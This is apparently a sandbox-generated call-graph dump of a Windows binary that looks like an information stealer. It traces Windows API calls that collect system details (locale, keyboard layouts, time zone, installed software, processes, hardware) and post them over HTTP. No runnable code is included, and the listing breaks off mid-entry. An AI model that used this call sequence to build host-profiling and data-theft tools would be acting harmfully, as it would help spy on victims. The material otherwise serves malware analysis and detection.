14385 9a8a0 lstrcpy 14384->14385 14386 84cff 14385->14386 14387 9a9b0 4 API calls 14386->14387 14388 84d1f 14387->14388 14389 9a8a0 lstrcpy 14388->14389 14390 84d28 14389->14390 14391 9a9b0 4 API calls 14390->14391 14392 84d47 14391->14392 14393 9a8a0 lstrcpy 14392->14393 14394 84d50 14393->14394 14395 9a920 3 API calls 14394->14395 14396 84d6e 14395->14396 14397 9a8a0 lstrcpy 14396->14397 14398 84d77 14397->14398 14399 9a740 lstrcpy 14398->14399 14400 84d92 14399->14400 14401 9a920 3 API calls 14400->14401 14402 84db3 14401->14402 14403 9a920 3 API calls 14402->14403 14404 84dba 14403->14404 14405 9a8a0 lstrcpy 14404->14405 14406 84dc6 14405->14406 14407 84de7 lstrlen 14406->14407 14408 84dfa 14407->14408 14409 84e03 lstrlen 14408->14409 15348 9aad0 14409->15348 14411 84e13 HttpSendRequestA 14412 84e32 InternetReadFile 14411->14412 14413 84e67 InternetCloseHandle 14412->14413 14418 84e5e 14412->14418 14416 9a800 14413->14416 14415 9a9b0 4 API calls 14415->14418 14416->14338 14417 9a8a0 lstrcpy 14417->14418 14418->14412 14418->14413 14418->14415 14418->14417 15355 9aad0 14419->15355 14421 917c4 StrCmpCA 14422 917cf ExitProcess 14421->14422 14424 917d7 14421->14424 14423 919c2 14423->13342 14424->14423 14425 918ad StrCmpCA 14424->14425 14426 918cf StrCmpCA 14424->14426 14427 9185d StrCmpCA 14424->14427 14428 9187f StrCmpCA 14424->14428 14429 918f1 StrCmpCA 14424->14429 14430 91951 StrCmpCA 14424->14430 14431 91970 StrCmpCA 14424->14431 14432 91913 StrCmpCA 14424->14432 14433 91932 StrCmpCA 14424->14433 14434 9a820 lstrlen lstrcpy 14424->14434 14425->14424 14426->14424 14427->14424 14428->14424 14429->14424 14430->14424 14431->14424 14432->14424 14433->14424 14434->14424 14436 9a7a0 lstrcpy 14435->14436 14437 85979 14436->14437 14438 847b0 2 API calls 14437->14438 14439 85985 14438->14439 14440 9a740 lstrcpy 14439->14440 14441 859ba 14440->14441 14442 9a740 lstrcpy 14441->14442 14443 859c7 14442->14443 14444 9a740 lstrcpy 14443->14444 14445 859d4 14444->14445 14446 9a740 lstrcpy 14445->14446 14447 859e1 14446->14447 14448 9a740 lstrcpy 14447->14448 14449 859ee InternetOpenA StrCmpCA 14448->14449 14450 85a1d 14449->14450 14451 85fc3 InternetCloseHandle 14450->14451 14452 98b60 3 API calls 14450->14452 14453 85fe0 14451->14453 14454 85a3c 14452->14454 14456 89ac0 4 API calls 14453->14456 14455 9a920 3 API calls 14454->14455 14457 85a4f 14455->14457 14458 85fe6 14456->14458 14459 9a8a0 lstrcpy 14457->14459 14460 9a820 2 API calls 14458->14460 14462 8601f ctype 14458->14462 14464 85a58 14459->14464 14461 85ffd 14460->14461 14463 9a9b0 4 API calls 14461->14463 14466 9a7a0 lstrcpy 14462->14466 14465 86013 14463->14465 14468 9a9b0 4 API calls 14464->14468 14467 9a8a0 lstrcpy 14465->14467 14476 8604f 14466->14476 14467->14462 14469 85a82 14468->14469 14470 9a8a0 lstrcpy 14469->14470 14471 85a8b 14470->14471 14472 9a9b0 4 API calls 14471->14472 14473 85aaa 14472->14473 14474 9a8a0 lstrcpy 14473->14474 14475 85ab3 14474->14475 14477 9a920 3 API calls 14475->14477 14476->13348 14478 85ad1 14477->14478 14479 9a8a0 lstrcpy 14478->14479 14480 85ada 14479->14480 14481 9a9b0 4 API calls 14480->14481 14482 85af9 14481->14482 14483 9a8a0 lstrcpy 14482->14483 14484 85b02 14483->14484 14485 9a9b0 4 API calls 14484->14485 14486 85b21 14485->14486 14487 9a8a0 lstrcpy 14486->14487 14488 85b2a 14487->14488 14489 9a9b0 4 API calls 14488->14489 14490 85b56 14489->14490 14491 9a920 3 API calls 14490->14491 14492 85b5d 14491->14492 14493 9a8a0 lstrcpy 14492->14493 14494 85b66 14493->14494 14495 85b7c InternetConnectA 14494->14495 14495->14451 14496 85bac HttpOpenRequestA 14495->14496 14498 85c0b 14496->14498 14499 85fb6 InternetCloseHandle 14496->14499 14500 9a9b0 4 API calls 14498->14500 14499->14451 14501 85c1f 14500->14501 14502 9a8a0 lstrcpy 14501->14502 14503 85c28 14502->14503 14504 9a920 3 API calls 14503->14504 14505 85c46 14504->14505 14506 9a8a0 lstrcpy 14505->14506 14507 85c4f 14506->14507 14508 9a9b0 4 API calls 14507->14508 14509 85c6e 14508->14509 14510 9a8a0 lstrcpy 14509->14510 14511 85c77 14510->14511 14512 9a9b0 4 API calls 14511->14512 14513 85c98 14512->14513 14514 9a8a0 lstrcpy 14513->14514 14515 85ca1 14514->14515 14516 9a9b0 4 API calls 14515->14516 14517 85cc1 14516->14517 14518 9a8a0 lstrcpy 14517->14518 14519 85cca 14518->14519 14520 9a9b0 4 API calls 14519->14520 14521 85ce9 14520->14521 14522 9a8a0 lstrcpy 14521->14522 14523 85cf2 14522->14523 14524 9a920 3 API calls 14523->14524 14525 85d10 14524->14525 14526 9a8a0 lstrcpy 14525->14526 14527 85d19 14526->14527 14528 9a9b0 4 API calls 14527->14528 14529 85d38 14528->14529 14530 9a8a0 lstrcpy 14529->14530 14531 85d41 14530->14531 14532 9a9b0 4 API calls 14531->14532 14533 85d60 14532->14533 14534 9a8a0 lstrcpy 14533->14534 14535 85d69 14534->14535 14536 9a920 3 API calls 14535->14536 14537 85d87 14536->14537 14538 9a8a0 lstrcpy 14537->14538 14539 85d90 14538->14539 14540 9a9b0 4 API calls 14539->14540 14541 85daf 14540->14541 14542 9a8a0 lstrcpy 14541->14542 14543 85db8 14542->14543 14544 9a9b0 4 API calls 14543->14544 14545 85dd9 14544->14545 14546 9a8a0 lstrcpy 14545->14546 14547 85de2 14546->14547 14548 9a9b0 4 API calls 14547->14548 14549 85e02 14548->14549 14550 9a8a0 lstrcpy 14549->14550 14551 85e0b 14550->14551 14552 9a9b0 4 API calls 14551->14552 14553 85e2a 14552->14553 14554 9a8a0 lstrcpy 14553->14554 14555 85e33 14554->14555 14556 9a920 3 API calls 14555->14556 14557 85e54 14556->14557 14558 9a8a0 lstrcpy 14557->14558 14559 85e5d 14558->14559 14560 85e70 lstrlen 14559->14560 15356 9aad0 14560->15356 14562 85e81 lstrlen GetProcessHeap RtlAllocateHeap 15357 9aad0 14562->15357 14564 85eae lstrlen 14565 85ebe 14564->14565 14566 85ed7 lstrlen 14565->14566 14567 85ee7 14566->14567 14568 85ef0 lstrlen 14567->14568 14569 85f04 14568->14569 14570 85f1a lstrlen 14569->14570 15358 9aad0 14570->15358 14572 85f2a HttpSendRequestA 14573 85f35 InternetReadFile 14572->14573 14574 85f6a InternetCloseHandle 14573->14574 14578 85f61 14573->14578 14574->14499 14576 9a9b0 4 API calls 14576->14578 14577 9a8a0 lstrcpy 14577->14578 14578->14573 14578->14574 14578->14576 14578->14577 14581 91077 14579->14581 14580 91151 14580->13350 14581->14580 14582 9a820 lstrlen lstrcpy 14581->14582 14582->14581 14584 90db7 14583->14584 14585 90f17 14584->14585 14586 90ea4 StrCmpCA 14584->14586 14587 90e27 StrCmpCA 14584->14587 14588 90e67 StrCmpCA 14584->14588 14589 9a820 lstrlen lstrcpy 14584->14589 14585->13358 14586->14584 14587->14584 14588->14584 14589->14584 14591 90f67 14590->14591 14592 91044 14591->14592 14593 90fb2 StrCmpCA 14591->14593 14594 9a820 lstrlen lstrcpy 14591->14594 14592->13366 14593->14591 14594->14591 14596 9a740 lstrcpy 14595->14596 14597 91a26 14596->14597 14598 9a9b0 4 API calls 14597->14598 14599 91a37 14598->14599 14600 9a8a0 lstrcpy 14599->14600 14601 91a40 14600->14601 14602 9a9b0 4 API calls 14601->14602 14603 91a5b 14602->14603 14604 9a8a0 lstrcpy 14603->14604 14605 91a64 14604->14605 14606 9a9b0 4 API calls 14605->14606 14607 91a7d 14606->14607 14608 9a8a0 lstrcpy 14607->14608 14609 91a86 14608->14609 14610 9a9b0 4 API calls 14609->14610 14611 91aa1 14610->14611 14612 9a8a0 lstrcpy 14611->14612 14613 91aaa 14612->14613 14614 9a9b0 4 API calls 14613->14614 14615 91ac3 14614->14615 14616 9a8a0 lstrcpy 14615->14616 14617 91acc 14616->14617 14618 9a9b0 4 API calls 14617->14618 14619 91ae7 14618->14619 14620 9a8a0 lstrcpy 14619->14620 14621 91af0 14620->14621 14622 9a9b0 4 API calls 14621->14622 14623 91b09 14622->14623 14624 9a8a0 lstrcpy 14623->14624 14625 91b12 14624->14625 14626 9a9b0 4 API calls 14625->14626 14627 91b2d 14626->14627 14628 9a8a0 lstrcpy 14627->14628 14629 91b36 14628->14629 14630 9a9b0 4 API calls 14629->14630 14631 91b4f 14630->14631 14632 9a8a0 lstrcpy 14631->14632 14633 91b58 14632->14633 14634 9a9b0 4 API calls 14633->14634 14635 91b76 14634->14635 14636 9a8a0 lstrcpy 14635->14636 14637 91b7f 14636->14637 14638 97500 6 API calls 14637->14638 14639 91b96 14638->14639 14640 9a920 3 API calls 14639->14640 14641 91ba9 14640->14641 14642 9a8a0 lstrcpy 14641->14642 14643 91bb2 14642->14643 14644 9a9b0 4 API calls 14643->14644 14645 91bdc 14644->14645 14646 9a8a0 lstrcpy 14645->14646 14647 91be5 14646->14647 14648 9a9b0 4 API calls 14647->14648 14649 91c05 14648->14649 14650 9a8a0 lstrcpy 14649->14650 14651 91c0e 14650->14651 15359 97690 GetProcessHeap RtlAllocateHeap 14651->15359 14654 9a9b0 4 API calls 14655 91c2e 14654->14655 14656 9a8a0 lstrcpy 14655->14656 14657 91c37 14656->14657 14658 9a9b0 4 API calls 14657->14658 14659 91c56 14658->14659 14660 9a8a0 lstrcpy 14659->14660 14661 91c5f 14660->14661 14662 9a9b0 4 API calls 14661->14662 14663 91c80 14662->14663 14664 9a8a0 lstrcpy 14663->14664 14665 91c89 14664->14665 15366 977c0 GetCurrentProcess IsWow64Process 14665->15366 14668 9a9b0 4 API calls 14669 91ca9 14668->14669 14670 9a8a0 lstrcpy 14669->14670 14671 91cb2 14670->14671 14672 9a9b0 4 API calls 14671->14672 14673 91cd1 14672->14673 14674 9a8a0 lstrcpy 14673->14674 14675 91cda 14674->14675 14676 9a9b0 4 API calls 14675->14676 14677 91cfb 14676->14677 14678 9a8a0 lstrcpy 14677->14678 14679 91d04 14678->14679 14680 97850 3 API calls 14679->14680 14681 91d14 14680->14681 14682 9a9b0 4 API calls 14681->14682 14683 91d24 14682->14683 14684 9a8a0 lstrcpy 14683->14684 14685 91d2d 14684->14685 14686 9a9b0 4 API calls 14685->14686 14687 91d4c 14686->14687 14688 9a8a0 lstrcpy 14687->14688 14689 91d55 14688->14689 14690 9a9b0 4 API calls 14689->14690 14691 91d75 14690->14691 14692 9a8a0 lstrcpy 14691->14692 14693 91d7e 14692->14693 14694 978e0 3 API calls 14693->14694 14695 91d8e 14694->14695 14696 9a9b0 4 API calls 14695->14696 14697 91d9e 14696->14697 14698 9a8a0 lstrcpy 14697->14698 14699 91da7 14698->14699 14700 9a9b0 4 API calls 14699->14700 14701 91dc6 14700->14701 14702 9a8a0 lstrcpy 14701->14702 14703 91dcf 14702->14703 14704 9a9b0 4 API calls 14703->14704 14705 91df0 14704->14705 14706 9a8a0 lstrcpy 14705->14706 14707 91df9 14706->14707 15368 97980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14707->15368 14710 9a9b0 4 API calls 14711 91e19 14710->14711 14712 9a8a0 lstrcpy 14711->14712 14713 91e22 14712->14713 14714 9a9b0 4 API calls 14713->14714 14715 91e41 14714->14715 14716 9a8a0 lstrcpy 14715->14716 14717 91e4a 14716->14717 14718 9a9b0 4 API calls 14717->14718 14719 91e6b 14718->14719 14720 9a8a0 lstrcpy 14719->14720 14721 91e74 14720->14721 15370 97a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14721->15370 14724 9a9b0 4 API calls 14725 91e94 14724->14725 14726 9a8a0 lstrcpy 14725->14726 14727 91e9d 14726->14727 14728 9a9b0 4 API calls 14727->14728 14729 91ebc 14728->14729 14730 9a8a0 lstrcpy 14729->14730 14731 91ec5 14730->14731 14732 9a9b0 4 API calls 14731->14732 14733 91ee5 14732->14733 14734 9a8a0 lstrcpy 14733->14734 14735 91eee 14734->14735 15373 97b00 GetUserDefaultLocaleName 14735->15373 14738 9a9b0 4 API calls 14739 91f0e 14738->14739 14740 9a8a0 lstrcpy 14739->14740 14741 91f17 14740->14741 14742 9a9b0 4 API calls 14741->14742 14743 91f36 14742->14743 14744 9a8a0 lstrcpy 14743->14744 14745 91f3f 14744->14745 14746 9a9b0 4 API calls 14745->14746 14747 91f60 14746->14747 14748 9a8a0 lstrcpy 14747->14748 14749 91f69 14748->14749 15377 97b90 14749->15377 14751 91f80 14752 9a920 3 API calls 14751->14752 14753 91f93 14752->14753 14754 9a8a0 lstrcpy 14753->14754 14755 91f9c 14754->14755 14756 9a9b0 4 API calls 14755->14756 14757 91fc6 14756->14757 14758 9a8a0 lstrcpy 14757->14758 14759 91fcf 14758->14759 14760 9a9b0 4 API calls 14759->14760 14761 91fef 14760->14761 14762 9a8a0 lstrcpy 14761->14762 14763 91ff8 14762->14763 15389 97d80 GetSystemPowerStatus 14763->15389 14766 9a9b0 4 API calls 14767 92018 14766->14767 14768 9a8a0 lstrcpy 14767->14768 14769 92021 14768->14769 14770 9a9b0 4 API calls 14769->14770 14771 92040 14770->14771 14772 9a8a0 lstrcpy 14771->14772 14773 92049 14772->14773 14774 9a9b0 4 API calls 14773->14774 14775 9206a 14774->14775 14776 9a8a0 lstrcpy 14775->14776 14777 92073 14776->14777 14778 9207e GetCurrentProcessId 14777->14778 15391 99470 OpenProcess 14778->15391 14781 9a920 3 API calls 14782 920a4 14781->14782 14783 9a8a0 lstrcpy 14782->14783 14784 920ad 14783->14784 14785 9a9b0 4 API calls 14784->14785 14786 920d7 14785->14786 14787 9a8a0 lstrcpy 14786->14787 14788 920e0 14787->14788 14789 9a9b0 4 API calls 14788->14789 14790 92100 14789->14790 14791 9a8a0 lstrcpy 14790->14791 14792 92109 14791->14792 15396 97e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14792->15396 14795 9a9b0 4 API calls 14796 92129 14795->14796 14797 9a8a0 lstrcpy 14796->14797 14798 92132 14797->14798 14799 9a9b0 4 API calls 14798->14799 14800 92151 14799->14800 14801 9a8a0 lstrcpy 14800->14801 14802 9215a 14801->14802 14803 9a9b0 4 API calls 14802->14803 14804 9217b 14803->14804 14805 9a8a0 lstrcpy 14804->14805 14806 92184 14805->14806 15400 97f60 14806->15400 14809 9a9b0 4 API calls 14810 921a4 14809->14810 14811 9a8a0 lstrcpy 14810->14811 14812 921ad 14811->14812 14813 9a9b0 4 API calls 14812->14813 14814 921cc 14813->14814 14815 9a8a0 lstrcpy 14814->14815 14816 921d5 14815->14816 14817 9a9b0 4 API calls 14816->14817 14818 921f6 14817->14818 14819 9a8a0 lstrcpy 14818->14819 14820 921ff 14819->14820 15413 97ed0 GetSystemInfo wsprintfA 14820->15413 14823 9a9b0 4 API calls 14824 9221f 14823->14824 14825 9a8a0 lstrcpy 14824->14825 14826 92228 14825->14826 14827 9a9b0 4 API calls 14826->14827 14828 92247 14827->14828 14829 9a8a0 lstrcpy 14828->14829 14830 92250 14829->14830 14831 9a9b0 4 API calls 14830->14831 14832 92270 14831->14832 14833 9a8a0 lstrcpy 14832->14833 14834 92279 14833->14834 15415 98100 GetProcessHeap RtlAllocateHeap 14834->15415 14837 9a9b0 4 API calls 14838 92299 14837->14838 14839 9a8a0 lstrcpy 14838->14839 14840 922a2 14839->14840 14841 9a9b0 4 API calls 14840->14841 14842 922c1 14841->14842 14843 9a8a0 lstrcpy 14842->14843 14844 922ca 14843->14844 14845 9a9b0 4 API calls 14844->14845 14846 922eb 14845->14846 14847 9a8a0 lstrcpy 14846->14847 14848 922f4 14847->14848 15421 987c0 14848->15421 14851 9a920 3 API calls 14852 9231e 14851->14852 14853 9a8a0 lstrcpy 14852->14853 14854 92327 14853->14854 14855 9a9b0 4 API calls 14854->14855 14856 92351 14855->14856 14857 9a8a0 lstrcpy 14856->14857 14858 9235a 14857->14858 14859 9a9b0 4 API calls 14858->14859 14860 9237a 14859->14860 14861 9a8a0 lstrcpy 14860->14861 14862 92383 14861->14862 14863 9a9b0 4 API calls 14862->14863 14864 923a2 14863->14864 14865 9a8a0 lstrcpy 14864->14865 14866 923ab 14865->14866 15426 981f0 14866->15426 14868 923c2 14869 9a920 3 API calls 14868->14869 14870 923d5 14869->14870 14871 9a8a0 lstrcpy 14870->14871 14872 923de 14871->14872 14873 9a9b0 4 API calls 14872->14873 14874 9240a 14873->14874 14875 9a8a0 lstrcpy 14874->14875 14876 92413 14875->14876 14877 9a9b0 4 API calls 14876->14877 14878 92432 14877->14878 14879 9a8a0 lstrcpy 14878->14879 14880 9243b 14879->14880 14881 9a9b0 4 API calls 14880->14881 14882 9245c 14881->14882 14883 9a8a0 lstrcpy 14882->14883 14884 92465 14883->14884 14885 9a9b0 4 API calls 14884->14885 14886 92484 14885->14886 14887 9a8a0 lstrcpy 14886->14887 14888 9248d 14887->14888 14889 9a9b0 4 API calls 14888->14889 14890 924ae 14889->14890 14891 9a8a0 lstrcpy 14890->14891 14892 924b7 14891->14892 15434 98320 14892->15434 14894 924d3 14895 9a920 3 API calls 14894->14895 14896 924e6 14895->14896 14897 9a8a0 lstrcpy 14896->14897 14898 924ef 14897->14898 14899 9a9b0 4 API calls 14898->14899 14900 92519 14899->14900 14901 9a8a0 lstrcpy 14900->14901 14902 92522 14901->14902 14903 9a9b0 4 API calls 14902->14903 14904 92543 14903->14904 14905 9a8a0 lstrcpy 14904->14905 14906 9254c 14905->14906 14907 98320 17 API calls 14906->14907 14908 92568 14907->14908 14909 9a920 3 API calls 14908->14909 14910 9257b 14909->14910 14911 9a8a0 lstrcpy 14910->14911 14912 92584 14911->14912 14913 9a9b0 4 API calls 14912->14913 14914 925ae 14913->14914 14915 9a8a0 lstrcpy 14914->14915 14916 925b7 14915->14916 14917 9a9b0 4 API calls 14916->14917 14918 925d6 14917->14918 14919 9a8a0 lstrcpy 14918->14919 14920 925df 14919->14920 14921 9a9b0 4 API calls 14920->14921 14922 92600 14921->14922 14923 9a8a0 lstrcpy 14922->14923 14924 92609 14923->14924 15470 98680 14924->15470 14926 92620 14927 9a920 3 API calls 14926->14927 14928 92633 14927->14928 14929 9a8a0 lstrcpy 14928->14929 14930 9263c 14929->14930 14931 9265a lstrlen 14930->14931 14932 9266a 14931->14932 14933 9a740 lstrcpy 14932->14933 14934 9267c 14933->14934 14935 81590 lstrcpy 14934->14935 14936 9268d 14935->14936 15480 95190 14936->15480 14938 92699 14938->13370 15668 9aad0 14939->15668 14941 85009 InternetOpenUrlA 14945 85021 14941->14945 14942 8502a InternetReadFile 14942->14945 14943 850a0 InternetCloseHandle InternetCloseHandle 14944 850ec 14943->14944 14944->13374 14945->14942 14945->14943 15669 898d0 14946->15669 14948 90759 14949 90a38 14948->14949 14950 9077d 14948->14950 14951 81590 lstrcpy 14949->14951 14953 90799 StrCmpCA 14950->14953 14952 90a49 14951->14952 15845 90250 14952->15845 14955 90843 14953->14955 14956 907a8 14953->14956 14959 90865 StrCmpCA 14955->14959 14958 9a7a0 lstrcpy 14956->14958 14960 907c3 14958->14960 14962 90874 14959->14962 14998 9096b 14959->14998 14961 81590 lstrcpy 14960->14961 14963 9080c 14961->14963 14964 9a740 lstrcpy 14962->14964 14965 9a7a0 lstrcpy 14963->14965 14967 90881 14964->14967 14968 90823 14965->14968 14966 9099c StrCmpCA 14969 909ab 14966->14969 14970 90a2d 14966->14970 14971 9a9b0 4 API calls 14967->14971 14972 9a7a0 lstrcpy 14968->14972 14973 81590 lstrcpy 14969->14973 14970->13378 14974 908ac 14971->14974 14976 9083e 14972->14976 14977 909f4 14973->14977 14975 9a920 3 API calls 14974->14975 14978 908b3 14975->14978 15672 8fb00 14976->15672 14980 9a7a0 lstrcpy 14977->14980 14982 9a9b0 4 API calls 14978->14982 14981 90a0d 14980->14981 14983 9a7a0 lstrcpy 14981->14983 14984 908ba 14982->14984 14985 90a28 14983->14985 14986 9a8a0 lstrcpy 14984->14986 15788 90030 14985->15788 14998->14966 15320 9a7a0 lstrcpy 15319->15320 15321 81683 15320->15321 15322 9a7a0 lstrcpy 15321->15322 15323 81695 15322->15323 15324 9a7a0 lstrcpy 15323->15324 15325 816a7 15324->15325 15326 9a7a0 lstrcpy 15325->15326 15327 815a3 15326->15327 15327->14201 15329 847c6 15328->15329 15330 84838 lstrlen 15329->15330 15354 9aad0 15330->15354 15332 84848 InternetCrackUrlA 15333 84867 15332->15333 15333->14278 15335 9a740 lstrcpy 15334->15335 15336 98b74 15335->15336 15337 9a740 lstrcpy 15336->15337 15338 98b82 GetSystemTime 15337->15338 15340 98b99 15338->15340 15339 9a7a0 lstrcpy 15341 98bfc 15339->15341 15340->15339 15341->14293 15343 9a931 15342->15343 15344 9a988 15343->15344 15347 9a968 lstrcpy lstrcat 15343->15347 15345 9a7a0 lstrcpy 15344->15345 15346 9a994 15345->15346 15346->14297 15347->15344 15348->14411 15350 89af9 LocalAlloc 15349->15350 15351 84eee 15349->15351 15350->15351 15352 89b14 CryptStringToBinaryA 15350->15352 15351->14299 15351->14302 15352->15351 15353 89b39 LocalFree 15352->15353 15353->15351 15354->15332 15355->14421 15356->14562 15357->14564 15358->14572 15487 977a0 15359->15487 15362 91c1e 15362->14654 15363 976c6 RegOpenKeyExA 15364 97704 RegCloseKey 15363->15364 15365 976e7 RegQueryValueExA 15363->15365 15364->15362 15365->15364 15367 91c99 15366->15367 15367->14668 15369 91e09 15368->15369 15369->14710 15371 97a9a wsprintfA 15370->15371 15372 91e84 15370->15372 15371->15372 15372->14724 15374 97b4d 15373->15374 15375 91efe 15373->15375 15494 98d20 LocalAlloc CharToOemW 15374->15494 15375->14738 15378 9a740 lstrcpy 15377->15378 15379 97bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15378->15379 15386 97c25 15379->15386 15380 97d18 15382 97d28 15380->15382 15383 97d1e LocalFree 15380->15383 15381 97c46 GetLocaleInfoA 15381->15386 15385 9a7a0 lstrcpy 15382->15385 15383->15382 15384 9a9b0 lstrcpy lstrlen lstrcpy lstrcat 15384->15386 15388 97d37 15385->15388 15386->15380 15386->15381 15386->15384 15387 9a8a0 lstrcpy 15386->15387 15387->15386 15388->14751 15390 92008 15389->15390 15390->14766 15392 99493 GetModuleFileNameExA CloseHandle 15391->15392 15393 994b5 15391->15393 15392->15393 15394 9a740 lstrcpy 15393->15394 15395 92091 15394->15395 15395->14781 15397 97e68 RegQueryValueExA 15396->15397 15398 92119 15396->15398 15399 97e8e RegCloseKey 15397->15399 15398->14795 15399->15398 15401 97fb9 GetLogicalProcessorInformationEx 15400->15401 15402 98029 15401->15402 15403 97fd8 GetLastError 15401->15403 15407 989f0 2 API calls 15402->15407 15411 98022 15403->15411 15412 97fe3 15403->15412 15405 92194 15405->14809 15409 9807b 15407->15409 15408 989f0 2 API calls 15408->15405 15410 98084 wsprintfA 15409->15410 15409->15411 15410->15405 15411->15405 15411->15408 15412->15401 15412->15405 15495 989f0 15412->15495 15498 98a10 GetProcessHeap RtlAllocateHeap 15412->15498 15414 9220f 15413->15414 15414->14823 15416 989b0 15415->15416 15417 9814d GlobalMemoryStatusEx 15416->15417 15420 98163 __aulldiv 15417->15420 15418 9819b wsprintfA 15419 92289 15418->15419 15419->14837 15420->15418 15422 987fb GetProcessHeap RtlAllocateHeap wsprintfA 15421->15422 15424 9a740 lstrcpy 15422->15424 15425 9230b 15424->15425 15425->14851 15427 9a740 lstrcpy 15426->15427 15433 98229 15427->15433 15428 98263 15430 9a7a0 lstrcpy 15428->15430 15429 9a9b0 lstrcpy lstrlen lstrcpy lstrcat 15429->15433 15431 982dc 15430->15431 15431->14868 15432 9a8a0 lstrcpy 15432->15433 15433->15428 15433->15429 15433->15432 15435 9a740 lstrcpy 15434->15435 15436 9835c RegOpenKeyExA 15435->15436 15437 983ae 15436->15437 15438 983d0 15436->15438 15439 9a7a0 lstrcpy 15437->15439 15440 983f8 RegEnumKeyExA 15438->15440 15441 98613 RegCloseKey 15438->15441 15450 983bd 15439->15450 15442 9843f wsprintfA RegOpenKeyExA 15440->15442 15443 9860e 15440->15443 15444 9a7a0 lstrcpy 15441->15444 15445 984c1 RegQueryValueExA 15442->15445 15446 98485 RegCloseKey RegCloseKey 15442->15446 15443->15441 15444->15450 15448 984fa lstrlen 15445->15448 15449 98601 RegCloseKey 15445->15449 15447 9a7a0 lstrcpy 15446->15447 15447->15450 15448->15449 15451 98510 15448->15451 15449->15443 15450->14894 15452 9a9b0 4 API calls 15451->15452 15453 98527 15452->15453 15454 9a8a0 lstrcpy 15453->15454 15455 98533 15454->15455 15456 9a9b0 4 API calls 15455->15456 15457 98557 15456->15457 15458 9a8a0 lstrcpy 15457->15458 15459 98563 15458->15459 15460 9856e RegQueryValueExA 15459->15460 15460->15449 15461 985a3 15460->15461 15462 9a9b0 4 API calls 15461->15462 15463 985ba 15462->15463 15464 9a8a0 lstrcpy 15463->15464 15465 985c6 15464->15465 15466 9a9b0 4 API calls 15465->15466 15467 985ea 15466->15467 15468 9a8a0 lstrcpy 15467->15468 15469 985f6 15468->15469 15469->15449 15471 9a740 lstrcpy 15470->15471 15472 986bc CreateToolhelp32Snapshot Process32First 15471->15472 15473 986e8 Process32Next 15472->15473 15474 9875d CloseHandle 15472->15474 15473->15474 15479 986fd 15473->15479 15475 9a7a0 lstrcpy 15474->15475 15477 98776 15475->15477 15476 9a8a0 lstrcpy 15476->15479 15477->14926 15478 9a9b0 lstrcpy lstrlen lstrcpy lstrcat 15478->15479 15479->15473 15479->15476 15479->15478 15481 9a7a0 lstrcpy 15480->15481 15482 951b5 15481->15482 15483 81590 lstrcpy 15482->15483 15484 951c6 15483->15484 15499 85100 15484->15499 15486 951cf 15486->14938 15490 97720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15487->15490 15489 976b9 15489->15362 15489->15363 15491 97780 RegCloseKey 15490->15491 15492 97765 RegQueryValueExA 15490->15492 15493 97793 15491->15493 15492->15491 15493->15489 15494->15375 15496 989f9 GetProcessHeap HeapFree 15495->15496 15497 98a0c 15495->15497 15496->15497 15497->15412 15498->15412 15500 9a7a0 lstrcpy 15499->15500 15501 85119 15500->15501 15502 847b0 2 API calls 15501->15502 15503 85125 15502->15503 15659 98ea0 15503->15659 15505 85184 15506 85192 lstrlen 15505->15506 15507 851a5 15506->15507 15508 98ea0 4 API calls 15507->15508 15509 851b6 15508->15509 15510 9a740 lstrcpy 15509->15510 15511 851c9 15510->15511 15512 9a740 lstrcpy 15511->15512 15513 851d6 15512->15513 15514 9a740 lstrcpy 15513->15514 15515 851e3 15514->15515 15516 9a740 lstrcpy 15515->15516 15517 851f0 15516->15517 15518 9a740 lstrcpy 15517->15518 15519 851fd InternetOpenA StrCmpCA 15518->15519 15520 8522f 15519->15520 15521 858c4 InternetCloseHandle 15520->15521 15522 98b60 3 API calls 15520->15522 15530 858d9 ctype 15521->15530 15523 8524e 15522->15523 15524 9a920 3 API calls 15523->15524 15525 85261 15524->15525 15526 9a8a0 lstrcpy 15525->15526 15527 8526a 15526->15527 15528 9a9b0 4 API calls 15527->15528 15529 852ab 15528->15529 15531 9a920 3 API calls 15529->15531 15532 9a7a0 lstrcpy 15530->15532 15533 852b2 15531->15533 15539 85913 15532->15539 15534 9a9b0 4 API calls 15533->15534 15535 852b9 15534->15535 15536 9a8a0 lstrcpy 15535->15536 15537 852c2 15536->15537 15538 9a9b0 4 API calls 15537->15538 15540 85303 15538->15540 15539->15486 15541 9a920 3 API calls 15540->15541 15542 8530a 15541->15542 15543 9a8a0 lstrcpy 15542->15543 15544 85313 15543->15544 15545 85329 InternetConnectA 15544->15545 15545->15521 15546 85359 HttpOpenRequestA 15545->15546 15548 858b7 InternetCloseHandle 15546->15548 15549 853b7 15546->15549 15548->15521 15550 9a9b0 4 API calls 15549->15550 15551 853cb 15550->15551 15552 9a8a0 lstrcpy 15551->15552 15553 853d4 15552->15553 15554 9a920 3 API calls 15553->15554 15555 853f2 15554->15555 15556 9a8a0 lstrcpy 15555->15556 15557 853fb 15556->15557 15558 9a9b0 4 API calls 15557->15558 15559 8541a 15558->15559 15560 9a8a0 lstrcpy 15559->15560 15561 85423 15560->15561 15562 9a9b0 4 API calls 15561->15562 15563 85444 15562->15563 15564 9a8a0 lstrcpy 15563->15564 15565 8544d 15564->15565 15566 9a9b0 4 API calls 15565->15566 15567 8546e 15566->15567 15660 98ead CryptBinaryToStringA 15659->15660 15662 98ea9 15659->15662 15661 98ece GetProcessHeap RtlAllocateHeap 15660->15661 15660->15662 15661->15662 15663 98ef4 ctype 15661->15663 15662->15505 15664 98f05 CryptBinaryToStringA 15663->15664 15664->15662 15668->14941 15911 89880 15669->15911 15671 898e1 15671->14948 15673 9a740 lstrcpy 15672->15673 15846 9a740 lstrcpy 15845->15846 15847 90266 15846->15847 15848 98de0 2 API calls 15847->15848 15849 9027b 15848->15849 15850 9a920 3 API calls 15849->15850 15851 9028b 15850->15851 15852 9a8a0 lstrcpy 15851->15852 15853 90294 15852->15853 15854 9a9b0 4 API calls 15853->15854 15912 8988e 15911->15912 15915 86fb0 15912->15915 15914 898ad ctype 15914->15671 15918 86d40 15915->15918 15919 86d63 15918->15919 15928 86d59 15918->15928 15934 86530 15919->15934 15923 86dbe 15923->15928 15944 869b0 15923->15944 15925 86e2a 15926 86ee6 VirtualFree 15925->15926 15925->15928 15933 86ef7 15925->15933 15926->15933 15927 86f41 15927->15928 15929 989f0 2 API calls 15927->15929 15928->15914 15929->15928 15930 